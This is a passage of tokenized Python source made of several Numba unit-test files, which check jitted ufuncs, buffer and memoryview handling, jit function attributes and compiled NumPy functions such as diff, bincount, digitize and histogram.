, a1 , o0 ) <EOL> X = np . linspace ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:20> ) <EOL> X0 = X [ : <NUM_LIT:10> ] <EOL> X1 = X [ <NUM_LIT:10> : ] <EOL> out0 = np . zeros ( <NUM_LIT:10> ) <EOL> npmadd ( X0 , X1 , out0 ) <EOL> np . testing . assert_array_equal ( X0 + X1 , out0 ) <EOL> Y0 = X0 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> Y1 = X1 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> out1 = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> npmadd ( Y0 , Y1 , out1 ) <EOL> np . testing . assert_array_equal ( Y0 + Y1 , out1 ) <EOL> Y2 = X1 [ : <NUM_LIT:5> ] <EOL> out2 = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> npmadd ( Y0 , Y2 , out2 ) <EOL> np . testing . 
assert_array_equal ( Y0 + Y2 , out2 ) <EOL> def test_npm_call_implicit_output ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> @ njit <EOL> def npmadd ( a0 , a1 ) : <EOL> return duadd ( a0 , a1 ) <EOL> X = np . linspace ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:20> ) <EOL> X0 = X [ : <NUM_LIT:10> ] <EOL> X1 = X [ <NUM_LIT:10> : ] <EOL> out0 = npmadd ( X0 , X1 ) <EOL> np . testing . assert_array_equal ( X0 + X1 , out0 ) <EOL> Y0 = X0 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> Y1 = X1 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> out1 = npmadd ( Y0 , Y1 ) <EOL> np . testing . assert_array_equal ( Y0 + Y1 , out1 ) <EOL> Y2 = X1 [ : <NUM_LIT:5> ] <EOL> out2 = npmadd ( Y0 , Y2 ) <EOL> np . testing . assert_array_equal ( Y0 + Y2 , out2 ) <EOL> out3 = npmadd ( <NUM_LIT:1.> , <NUM_LIT> ) <EOL> self . assertEqual ( out3 , <NUM_LIT> ) <EOL> def test_ufunc_props ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> self . assertEqual ( duadd . nin , <NUM_LIT:2> ) <EOL> self . assertEqual ( duadd . nout , <NUM_LIT:1> ) <EOL> self . assertEqual ( duadd . nargs , duadd . nin + duadd . nout ) <EOL> self . assertEqual ( duadd . ntypes , <NUM_LIT:0> ) <EOL> self . assertEqual ( duadd . types , [ ] ) <EOL> self . assertEqual ( duadd . identity , None ) <EOL> duadd ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> self . assertEqual ( duadd . ntypes , <NUM_LIT:1> ) <EOL> self . assertEqual ( duadd . ntypes , len ( duadd . types ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , division , absolute_import <EOL> import array <EOL> import sys <EOL> import numpy as np <EOL> from numba import unittest_support as unittest <EOL> from numba import jit <EOL> from . support import TestCase , compile_function , MemoryLeakMixin <EOL> @ jit ( nopython = True ) <EOL> def len_usecase ( buf ) : <EOL> return len ( buf ) <EOL> @ jit ( nopython = True ) <EOL> def getitem_usecase ( buf , i ) : <EOL> return buf [ i ] <EOL> @ jit ( nopython = True ) <EOL> def getslice_usecase ( buf , i , j ) : <EOL> s = buf [ i : j ] <EOL> return s [ <NUM_LIT:0> ] + <NUM_LIT:2> * s [ - <NUM_LIT:1> ] <EOL> @ jit ( nopython = True ) <EOL> def setitem_usecase ( buf , i , v ) : <EOL> buf [ i ] = v <EOL> @ jit ( nopython = True ) <EOL> def iter_usecase ( buf ) : <EOL> res = <NUM_LIT:0.0> <EOL> for i , x in enumerate ( buf ) : <EOL> res += x <EOL> res *= i + <NUM_LIT:1> <EOL> return res <EOL> def attrgetter ( attr ) : <EOL> code = """<STR_LIT>""" % locals ( ) <EOL> pyfunc = compile_function ( "<STR_LIT>" , code , globals ( ) ) <EOL> return jit ( nopython = True ) ( pyfunc ) <EOL> contiguous_usecase = attrgetter ( "<STR_LIT>" ) <EOL> c_contiguous_usecase = attrgetter ( "<STR_LIT>" ) <EOL> f_contiguous_usecase = attrgetter ( "<STR_LIT>" ) <EOL> itemsize_usecase = attrgetter ( "<STR_LIT>" ) <EOL> nbytes_usecase = attrgetter ( "<STR_LIT>" ) <EOL> ndim_usecase = attrgetter ( "<STR_LIT>" ) <EOL> readonly_usecase = attrgetter ( "<STR_LIT>" ) <EOL> shape_usecase = attrgetter ( "<STR_LIT>" ) <EOL> strides_usecase = attrgetter ( "<STR_LIT>" ) <EOL> array_supported = sys . version_info >= ( <NUM_LIT:3> , ) <EOL> bytes_supported = sys . version_info >= ( <NUM_LIT:3> , ) <EOL> memoryview_structured_indexing = sys . 
version_info >= ( <NUM_LIT:3> , ) <EOL> class TestBufferProtocol ( MemoryLeakMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _arrays ( self ) : <EOL> n = <NUM_LIT:10> <EOL> for letter , offset in [ <EOL> ( '<STR_LIT:b>' , - <NUM_LIT:3> ) , <EOL> ( '<STR_LIT:B>' , <NUM_LIT:0> ) , <EOL> ( '<STR_LIT:h>' , - <NUM_LIT> ) , <EOL> ( '<STR_LIT:H>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:i>' , - <NUM_LIT> ) , <EOL> ( '<STR_LIT:I>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:l>' , - <NUM_LIT> ) , <EOL> ( '<STR_LIT:L>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:q>' , - <NUM_LIT:2> ** <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:2> ** <NUM_LIT> + <NUM_LIT:1> ) , <EOL> ( '<STR_LIT:f>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:d>' , - <NUM_LIT> ) , <EOL> ] : <EOL> yield array . array ( letter , [ i + offset for i in range ( n ) ] ) <EOL> def _memoryviews ( self ) : <EOL> n = <NUM_LIT:10> <EOL> yield memoryview ( bytearray ( b"<STR_LIT>" ) ) <EOL> yield memoryview ( b"<STR_LIT>" ) <EOL> for dtype , start , stop in [ <EOL> ( '<STR_LIT>' , - <NUM_LIT:10> , <NUM_LIT:10> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:10> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT> , <NUM_LIT:1000> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT:2> ** <NUM_LIT> , <NUM_LIT:10> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:2> ** <NUM_LIT:64> - <NUM_LIT:10> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT> , <NUM_LIT:12> + <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT> , <NUM_LIT:12> + <NUM_LIT> ) , <EOL> ] : <EOL> yield memoryview ( np . linspace ( start , stop , n ) . astype ( dtype ) ) <EOL> arr = np . arange ( <NUM_LIT:12> ) . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> assert arr . flags . c_contiguous and not arr . flags . f_contiguous <EOL> yield memoryview ( arr ) <EOL> arr = arr . T <EOL> assert arr . 
flags . f_contiguous and not arr . flags . c_contiguous <EOL> yield memoryview ( arr ) <EOL> arr = arr [ : : <NUM_LIT:2> ] <EOL> assert not arr . flags . f_contiguous and not arr . flags . c_contiguous <EOL> yield memoryview ( arr ) <EOL> def _readonlies ( self ) : <EOL> if bytes_supported : <EOL> yield b"<STR_LIT>" <EOL> if memoryview_structured_indexing : <EOL> yield memoryview ( b"<STR_LIT>" ) <EOL> arr = np . arange ( <NUM_LIT:5> ) <EOL> arr . setflags ( write = False ) <EOL> yield memoryview ( arr ) <EOL> def _check_unary ( self , jitfunc , * args ) : <EOL> pyfunc = jitfunc . py_func <EOL> self . assertPreciseEqual ( jitfunc ( * args ) , pyfunc ( * args ) ) <EOL> def check_len ( self , obj ) : <EOL> self . _check_unary ( len_usecase , obj ) <EOL> def check_iter ( self , obj ) : <EOL> self . _check_unary ( iter_usecase , obj ) <EOL> def check_getitem ( self , obj ) : <EOL> def yield_indices ( obj ) : <EOL> try : <EOL> shape = obj . shape <EOL> except AttributeError : <EOL> shape = len ( obj ) , <EOL> for tup in np . ndindex ( shape ) : <EOL> if len ( tup ) == <NUM_LIT:1> : <EOL> yield tup [ <NUM_LIT:0> ] <EOL> else : <EOL> yield tup <EOL> for i in yield_indices ( obj ) : <EOL> try : <EOL> expected = obj [ i ] <EOL> except ( NotImplementedError , TypeError ) : <EOL> if isinstance ( obj , memoryview ) : <EOL> expected = obj . obj [ i ] <EOL> else : <EOL> raise <EOL> self . assertPreciseEqual ( getitem_usecase ( obj , i ) , expected ) <EOL> def check_setitem ( self , obj ) : <EOL> for i in range ( len ( obj ) ) : <EOL> orig = list ( obj ) <EOL> val = obj [ i ] // <NUM_LIT:2> + <NUM_LIT:1> <EOL> setitem_usecase ( obj , i , val ) <EOL> self . assertEqual ( obj [ i ] , val ) <EOL> for j , val in enumerate ( orig ) : <EOL> if j != i : <EOL> self . assertEqual ( obj [ j ] , val ) <EOL> def check_getslice ( self , obj ) : <EOL> self . _check_unary ( getslice_usecase , obj , <NUM_LIT:1> , len ( obj ) - <NUM_LIT:1> ) <EOL> def test_len ( self ) : <EOL> self . 
check_len ( bytearray ( <NUM_LIT:5> ) ) <EOL> if bytes_supported : <EOL> self . check_len ( b"<STR_LIT>" ) <EOL> for mem in self . _memoryviews ( ) : <EOL> self . check_len ( mem ) <EOL> if array_supported : <EOL> for arr in self . _arrays ( ) : <EOL> self . check_len ( arr ) <EOL> for buf in self . _readonlies ( ) : <EOL> self . check_getitem ( buf ) <EOL> def test_getitem ( self ) : <EOL> self . check_getitem ( bytearray ( b"<STR_LIT:abc>" ) ) <EOL> if bytes_supported : <EOL> self . check_getitem ( b"<STR_LIT>" ) <EOL> if memoryview_structured_indexing : <EOL> for mem in self . _memoryviews ( ) : <EOL> self . check_getitem ( mem ) <EOL> if array_supported : <EOL> for arr in self . _arrays ( ) : <EOL> self . check_getitem ( arr ) <EOL> for buf in self . _readonlies ( ) : <EOL> self . check_getitem ( buf ) <EOL> def test_getslice ( self ) : <EOL> with self . assertTypingError ( ) : <EOL> self . check_getslice ( bytearray ( b"<STR_LIT>" ) ) <EOL> if bytes_supported : <EOL> self . check_getslice ( b"<STR_LIT>" ) <EOL> if memoryview_structured_indexing : <EOL> self . check_getslice ( memoryview ( b"<STR_LIT>" ) ) <EOL> if array_supported : <EOL> with self . assertTypingError ( ) : <EOL> self . check_getslice ( array . array ( '<STR_LIT:i>' , range ( <NUM_LIT:10> ) ) ) <EOL> for buf in self . _readonlies ( ) : <EOL> self . check_getitem ( buf ) <EOL> def test_setitem ( self ) : <EOL> self . check_setitem ( bytearray ( b"<STR_LIT>" ) ) <EOL> if array_supported : <EOL> for arr in self . _arrays ( ) : <EOL> self . check_setitem ( arr ) <EOL> if memoryview_structured_indexing : <EOL> for mem in self . _memoryviews ( ) : <EOL> self . check_getitem ( mem ) <EOL> for buf in self . _readonlies ( ) : <EOL> with self . assertTypingError ( ) : <EOL> self . check_setitem ( buf ) <EOL> def test_iter ( self ) : <EOL> self . check_iter ( bytearray ( b"<STR_LIT:abc>" ) ) <EOL> if bytes_supported : <EOL> self . 
check_iter ( b"<STR_LIT>" ) <EOL> if memoryview_structured_indexing : <EOL> self . check_iter ( memoryview ( b"<STR_LIT>" ) ) <EOL> if array_supported : <EOL> for arr in self . _arrays ( ) : <EOL> self . check_iter ( arr ) <EOL> for buf in self . _readonlies ( ) : <EOL> self . check_getitem ( buf ) <EOL> class TestMemoryView ( MemoryLeakMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _arrays ( self ) : <EOL> arr = np . arange ( <NUM_LIT:12> ) <EOL> yield arr <EOL> arr = arr . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> yield arr <EOL> yield arr . T <EOL> yield arr [ : : <NUM_LIT:2> ] <EOL> arr . setflags ( write = False ) <EOL> yield arr <EOL> arr = np . zeros ( ( ) ) <EOL> assert arr . ndim == <NUM_LIT:0> <EOL> yield arr <EOL> def test_ndim ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( ndim_usecase ( m ) , arr . ndim ) <EOL> def test_shape ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( shape_usecase ( m ) , arr . shape ) <EOL> def test_strides ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( strides_usecase ( m ) , arr . strides ) <EOL> def test_itemsize ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( itemsize_usecase ( m ) , arr . itemsize ) <EOL> def test_nbytes ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( nbytes_usecase ( m ) , arr . size * arr . itemsize ) <EOL> def test_readonly ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertIs ( readonly_usecase ( m ) , not arr . flags . writeable ) <EOL> m = memoryview ( b"<STR_LIT>" ) <EOL> self . assertIs ( readonly_usecase ( m ) , True ) <EOL> m = memoryview ( bytearray ( b"<STR_LIT>" ) ) <EOL> self . 
assertIs ( readonly_usecase ( m ) , False ) <EOL> @ unittest . skipUnless ( sys . version_info >= ( <NUM_LIT:3> , ) , <EOL> "<STR_LIT>" ) <EOL> def test_contiguous ( self ) : <EOL> m = memoryview ( bytearray ( b"<STR_LIT>" ) ) <EOL> self . assertIs ( contiguous_usecase ( m ) , True ) <EOL> self . assertIs ( c_contiguous_usecase ( m ) , True ) <EOL> self . assertIs ( f_contiguous_usecase ( m ) , True ) <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertIs ( contiguous_usecase ( m ) , <EOL> arr . flags . f_contiguous or arr . flags . c_contiguous ) <EOL> self . assertIs ( c_contiguous_usecase ( m ) , arr . flags . c_contiguous ) <EOL> self . assertIs ( f_contiguous_usecase ( m ) , arr . flags . f_contiguous ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function <EOL> import numba . unittest_support as unittest <EOL> from numba import jit <EOL> class TestFuncInterface ( unittest . TestCase ) : <EOL> def test_jit_function_docstring ( self ) : <EOL> def add ( x , y ) : <EOL> '''<STR_LIT>''' <EOL> return x + y <EOL> c_add = jit ( add ) <EOL> self . assertEqual ( c_add . __doc__ , '<STR_LIT>' ) <EOL> def test_jit_function_name ( self ) : <EOL> def add ( x , y ) : <EOL> return x + y <EOL> c_add = jit ( add ) <EOL> self . assertEqual ( c_add . __name__ , '<STR_LIT>' ) <EOL> def test_jit_function_module ( self ) : <EOL> def add ( x , y ) : <EOL> return x + y <EOL> c_add = jit ( add ) <EOL> self . assertEqual ( c_add . __module__ , add . __module__ ) <EOL> def test_jit_function_code_object ( self ) : <EOL> def add ( x , y ) : <EOL> return x + y <EOL> c_add = jit ( add ) <EOL> self . assertEqual ( c_add . __code__ , add . __code__ ) <EOL> self . assertEqual ( c_add . func_code , add . __code__ ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , absolute_import , division <EOL> import itertools <EOL> import math <EOL> import sys <EOL> import numpy as np <EOL> from numba import unittest_support as unittest <EOL> from numba . compiler import compile_isolated , Flags , utils <EOL> from numba import jit , typeof , types <EOL> from numba . numpy_support import version as np_version <EOL> from . support import TestCase , CompilationCache <EOL> no_pyobj_flags = Flags ( ) <EOL> no_pyobj_flags . set ( "<STR_LIT>" ) <EOL> def sinc ( x ) : <EOL> return np . sinc ( x ) <EOL> def angle1 ( x ) : <EOL> return np . angle ( x ) <EOL> def angle2 ( x , deg ) : <EOL> return np . angle ( x , deg ) <EOL> def diff1 ( a ) : <EOL> return np . diff ( a ) <EOL> def diff2 ( a , n ) : <EOL> return np . diff ( a , n ) <EOL> def bincount1 ( a ) : <EOL> return np . bincount ( a ) <EOL> def bincount2 ( a , w ) : <EOL> return np . bincount ( a , weights = w ) <EOL> def searchsorted ( a , v ) : <EOL> return np . searchsorted ( a , v ) <EOL> def digitize ( * args ) : <EOL> return np . digitize ( * args ) <EOL> def histogram ( * args ) : <EOL> return np . histogram ( * args ) <EOL> class TestNPFunctions ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . ccache = CompilationCache ( ) <EOL> self . rnd = np . random . RandomState ( <NUM_LIT> ) <EOL> def run_unary ( self , pyfunc , x_types , x_values , flags = no_pyobj_flags , <EOL> func_extra_types = None , func_extra_args = None , <EOL> ignore_sign_on_zero = False , abs_tol = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for tx , vx in zip ( x_types , x_values ) : <EOL> if func_extra_args is None : <EOL> func_extra_types = func_extra_args = [ ( ) ] <EOL> for xtypes , xargs in zip ( func_extra_types , func_extra_args ) : <EOL> cr = self . ccache . compile ( pyfunc , ( tx , ) + xtypes , <EOL> flags = flags ) <EOL> cfunc = cr . 
entry_point <EOL> got = cfunc ( vx , * xargs ) <EOL> expected = pyfunc ( vx , * xargs ) <EOL> try : <EOL> scalty = tx . dtype <EOL> except AttributeError : <EOL> scalty = tx <EOL> prec = ( '<STR_LIT>' <EOL> if scalty in ( types . float32 , types . complex64 ) <EOL> else '<STR_LIT>' ) <EOL> msg = '<STR_LIT>' % ( vx , prec ) <EOL> self . assertPreciseEqual ( got , expected , <EOL> prec = prec , <EOL> msg = msg , <EOL> ignore_sign_on_zero = <EOL> ignore_sign_on_zero , <EOL> abs_tol = abs_tol , ** kwargs ) <EOL> def test_sinc ( self ) : <EOL> """<STR_LIT>""" <EOL> isoz = True <EOL> tol = "<STR_LIT>" <EOL> pyfunc = sinc <EOL> def check ( x_types , x_values , ** kwargs ) : <EOL> self . run_unary ( pyfunc , x_types , x_values , <EOL> ignore_sign_on_zero = isoz , abs_tol = tol , <EOL> ** kwargs ) <EOL> x_values = [ <NUM_LIT:1.> , - <NUM_LIT:1.> , <NUM_LIT:0.0> , - <NUM_LIT:0.0> , <NUM_LIT:0.5> , - <NUM_LIT:0.5> , <NUM_LIT:5> , - <NUM_LIT:5> , <NUM_LIT> , - <NUM_LIT> ] <EOL> x_types = [ types . float32 , types . float64 ] * ( len ( x_values ) // <NUM_LIT:2> ) <EOL> check ( x_types , x_values ) <EOL> x_values = [ np . array ( x_values , dtype = np . float64 ) ] <EOL> x_types = [ typeof ( v ) for v in x_values ] <EOL> check ( x_types , x_values ) <EOL> x_values = [ <NUM_LIT:1.> + <NUM_LIT> , - <NUM_LIT:1> + <NUM_LIT> , <NUM_LIT:0.0> + <NUM_LIT> , - <NUM_LIT:0.0> + <NUM_LIT> , <NUM_LIT:0> + <NUM_LIT> , <NUM_LIT:0> - <NUM_LIT> , <NUM_LIT:0.5> + <NUM_LIT> , <EOL> - <NUM_LIT:0.5> + <NUM_LIT> , <NUM_LIT:0.5> + <NUM_LIT> , - <NUM_LIT:0.5> - <NUM_LIT> , <NUM_LIT:5> + <NUM_LIT> , - <NUM_LIT:5> - <NUM_LIT> , <EOL> <NUM_LIT> + <NUM_LIT> , - <NUM_LIT> + <NUM_LIT> , <NUM_LIT> , + ( <NUM_LIT:0> - <NUM_LIT> ) <EOL> ] <EOL> x_types = [ types . complex64 , types . complex128 ] * ( len ( x_values ) // <NUM_LIT:2> ) <EOL> check ( x_types , x_values , ulps = <NUM_LIT:2> ) <EOL> x_values = [ np . array ( x_values , dtype = np . 
complex128 ) ] <EOL> x_types = [ typeof ( v ) for v in x_values ] <EOL> check ( x_types , x_values , ulps = <NUM_LIT:2> ) <EOL> def test_angle ( self , flags = no_pyobj_flags ) : <EOL> """<STR_LIT>""" <EOL> pyfunc1 = angle1 <EOL> pyfunc2 = angle2 <EOL> def check ( x_types , x_values ) : <EOL> self . run_unary ( pyfunc1 , x_types , x_values ) <EOL> xtra_values = [ ( True , ) , ( False , ) ] <EOL> xtra_types = [ ( types . bool_ , ) ] * len ( xtra_values ) <EOL> self . run_unary ( pyfunc2 , x_types , x_values , <EOL> func_extra_types = xtra_types , <EOL> func_extra_args = xtra_values , ) <EOL> x_values = [ <NUM_LIT:1.> , - <NUM_LIT:1.> , <NUM_LIT:0.0> , - <NUM_LIT:0.0> , <NUM_LIT:0.5> , - <NUM_LIT:0.5> , <NUM_LIT:5> , - <NUM_LIT:5> ] <EOL> x_types = [ types . float32 , types . float64 ] * ( len ( x_values ) // <NUM_LIT:2> + <NUM_LIT:1> ) <EOL> check ( x_types , x_values ) <EOL> x_values = [ np . array ( x_values , dtype = np . float64 ) ] <EOL> x_types = [ typeof ( v ) for v in x_values ] <EOL> check ( x_types , x_values ) <EOL> x_values = [ <NUM_LIT:1.> + <NUM_LIT> , - <NUM_LIT:1> + <NUM_LIT> , <NUM_LIT:0.0> + <NUM_LIT> , - <NUM_LIT:0.0> + <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:0.5> + <NUM_LIT> , <EOL> - <NUM_LIT:0.5> + <NUM_LIT> , <NUM_LIT:0.5> + <NUM_LIT> , - <NUM_LIT:0.5> - <NUM_LIT> , <NUM_LIT:5> + <NUM_LIT> , - <NUM_LIT:5> - <NUM_LIT> ] <EOL> x_types = [ types . complex64 , types . complex128 ] * ( len ( x_values ) // <NUM_LIT:2> + <NUM_LIT:1> ) <EOL> check ( x_types , x_values ) <EOL> x_values = np . array ( x_values ) <EOL> x_types = [ types . complex64 , types . complex128 ] <EOL> check ( x_types , x_values ) <EOL> def diff_arrays ( self ) : <EOL> """<STR_LIT>""" <EOL> a = np . arange ( <NUM_LIT:12> ) ** <NUM_LIT:3> <EOL> yield a <EOL> b = a . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> yield b <EOL> c = np . arange ( <NUM_LIT> ) . 
reshape ( ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:4> ) ) ** <NUM_LIT:3> <EOL> yield c <EOL> def test_diff1 ( self ) : <EOL> pyfunc = diff1 <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for arr in self . diff_arrays ( ) : <EOL> expected = pyfunc ( arr ) <EOL> got = cfunc ( arr ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> a = np . array ( <NUM_LIT> ) <EOL> with self . assertTypingError ( ) : <EOL> cfunc ( a ) <EOL> def test_diff2 ( self ) : <EOL> pyfunc = diff2 <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for arr in self . diff_arrays ( ) : <EOL> size = arr . shape [ - <NUM_LIT:1> ] <EOL> for n in ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , size - <NUM_LIT:1> , size , size + <NUM_LIT:1> , <NUM_LIT> ) : <EOL> expected = pyfunc ( arr , n ) <EOL> got = cfunc ( arr , n ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> arr = np . array ( <NUM_LIT> ) <EOL> with self . assertTypingError ( ) : <EOL> cfunc ( arr , <NUM_LIT:1> ) <EOL> arr = np . arange ( <NUM_LIT:10> ) <EOL> for n in ( - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT> ) : <EOL> with self . assertRaises ( ValueError ) as raises : <EOL> cfunc ( arr , n ) <EOL> self . assertIn ( "<STR_LIT>" , str ( raises . exception ) ) <EOL> def bincount_sequences ( self ) : <EOL> """<STR_LIT>""" <EOL> a = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:20> ] <EOL> b = np . array ( [ <NUM_LIT:5> , <NUM_LIT:8> , <NUM_LIT> , <NUM_LIT:5> ] ) <EOL> c = self . rnd . randint ( <NUM_LIT:0> , <NUM_LIT:100> , size = <NUM_LIT> ) . astype ( np . int8 ) <EOL> return ( a , b , c ) <EOL> def test_bincount1 ( self ) : <EOL> pyfunc = bincount1 <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for seq in self . bincount_sequences ( ) : <EOL> expected = pyfunc ( seq ) <EOL> got = cfunc ( seq ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> with self . assertRaises ( ValueError ) as raises : <EOL> cfunc ( [ <NUM_LIT:2> , - <NUM_LIT:1> ] ) <EOL> self . 
assertIn ( "<STR_LIT>" , <EOL> str ( raises . exception ) ) <EOL> def test_bincount2 ( self ) : <EOL> pyfunc = bincount2 <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for seq in self . bincount_sequences ( ) : <EOL> w = [ math . sqrt ( x ) - <NUM_LIT:2> for x in seq ] <EOL> for weights in ( w , np . array ( w ) ) : <EOL> expected = pyfunc ( seq , weights ) <EOL> got = cfunc ( seq , weights ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> with self . assertRaises ( ValueError ) as raises : <EOL> cfunc ( [ <NUM_LIT:2> , - <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( raises . exception ) ) <EOL> with self . assertRaises ( ValueError ) as raises : <EOL> cfunc ( [ <NUM_LIT:2> , - <NUM_LIT:1> ] , [ <NUM_LIT:0> ] ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( raises . exception ) ) <EOL> def test_searchsorted ( self ) : <EOL> pyfunc = searchsorted <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> def check ( a , v ) : <EOL> expected = pyfunc ( a , v ) <EOL> got = cfunc ( a , v ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> bins = np . arange ( <NUM_LIT:5> ) ** <NUM_LIT:2> <EOL> values = np . arange ( <NUM_LIT:20> ) - <NUM_LIT:1> <EOL> for a in ( bins , list ( bins ) ) : <EOL> for v in values : <EOL> check ( a , v ) <EOL> for v in ( values , values . reshape ( ( <NUM_LIT:4> , <NUM_LIT:5> ) ) ) : <EOL> check ( a , v ) <EOL> check ( a , list ( values ) ) <EOL> bins = np . float64 ( list ( bins ) + [ float ( '<STR_LIT>' ) ] * <NUM_LIT:7> ) / <NUM_LIT> <EOL> values = np . arange ( <NUM_LIT:20> ) - <NUM_LIT:0.5> <EOL> for a in ( bins , list ( bins ) ) : <EOL> for v in values : <EOL> check ( a , v ) <EOL> for v in ( values , values . 
reshape ( ( <NUM_LIT:4> , <NUM_LIT:5> ) ) ) : <EOL> check ( a , v ) <EOL> check ( a , list ( values ) ) <EOL> def test_digitize ( self ) : <EOL> pyfunc = digitize <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> def check ( * args ) : <EOL> expected = pyfunc ( * args ) <EOL> got = cfunc ( * args ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> values = np . float64 ( ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT> , <EOL> float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) ) ) <EOL> assert len ( values ) == <NUM_LIT:12> <EOL> self . rnd . shuffle ( values ) <EOL> bins1 = np . float64 ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:8> ] ) <EOL> bins2 = np . float64 ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:8> , float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) ] ) <EOL> bins3 = np . float64 ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:8> , float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) ] <EOL> + [ float ( '<STR_LIT>' ) ] * <NUM_LIT:10> ) <EOL> if np_version >= ( <NUM_LIT:1> , <NUM_LIT:10> ) : <EOL> all_bins = [ bins1 , bins2 , bins3 ] <EOL> xs = [ values , values . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) ] <EOL> else : <EOL> all_bins = [ bins1 , bins2 ] <EOL> xs = [ values ] <EOL> for bins in all_bins : <EOL> bins . sort ( ) <EOL> for x in xs : <EOL> check ( x , bins ) <EOL> check ( x , bins [ : : - <NUM_LIT:1> ] ) <EOL> for bins in all_bins : <EOL> bins . sort ( ) <EOL> for right in ( True , False ) : <EOL> check ( values , bins , right ) <EOL> check ( values , bins [ : : - <NUM_LIT:1> ] , right ) <EOL> check ( list ( values ) , bins1 ) <EOL> def test_histogram ( self ) : <EOL> pyfunc = histogram <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> def check ( * args ) : <EOL> pyhist , pybins = pyfunc ( * args ) <EOL> chist , cbins = cfunc ( * args ) <EOL> self . assertPreciseEqual ( pyhist , chist ) <EOL> self . 
